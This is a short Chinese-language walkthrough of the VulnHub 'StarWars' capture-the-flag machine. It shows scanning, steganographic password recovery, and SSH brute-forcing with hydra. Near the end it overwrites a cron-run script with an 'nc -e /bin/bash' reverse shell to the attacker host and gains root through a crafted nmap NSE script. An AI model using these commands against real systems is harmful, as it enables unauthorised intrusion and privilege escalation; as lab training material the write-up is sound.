今天实践的是vulnhub的StarWars镜像，

下载地址，https://download.vulnhub.com/starwars/StarWars-Epi1-CTF.ova，

用workstation导入失败，

于是又用virtualbox导入，做地址扫描，

sudo netdiscover -r 192.168.1.0/24，109就是，

再继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.1.109，

有web服务，浏览器访问http://192.168.1.109，

提示了从图片里获取密码，猜测到一张图片是另一张图片做过数字隐写，

把yoda.png提交给在线解密站点，获取到了密码，babyYoda123，

https://stylesuxx.github.io/steganography/，

继续对靶机进行文件路径暴破，

dirb http://192.168.1.109 -X .php,.js,.txt，

浏览器访问http://192.168.1.109/users.js，获取到skywalker和han，

尝试出有效的用户名密码组合，han/babyYoda123，

ssh登录，ssh [email protected]，不是root，也不方便提权，

浏览器访问http://192.168.1.109/robots.txt，获取到/r2d2路径，

浏览器访问http://192.168.1.109/r2d2，

爬取关键字做密码字典，cewl http://192.168.1.109/r2d2 > dict.txt，

针对另一个之前获取到的用户名做暴破，

hydra -l skywalker -P dict.txt 192.168.1.109 ssh，

获取到有效的用户名密码组合，skywalker/tatooine，

ssh登录，ssh [email protected]，不是root，也不方便提权，

找到一个当前用户下可执行的python脚本evil.py，并且知道这个脚本每分钟被系统自动执行一次，

编辑文件，把内容改成反弹shell，vi evil.py，
import os
os.system("nc -e /bin/bash 192.168.1.108 4444")

在kali攻击机上用nc开个反弹shell监听，等一分钟shell就过来了，

转成交互式shell，python -c 'import pty; pty.spawn("/bin/bash")'，

sudo -l发现root权限执行的程序nmap，

利用nmap执行插件脚本的特性，把root的shell搞出来，id确认没问题，

echo "os.execute('/bin/sh')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse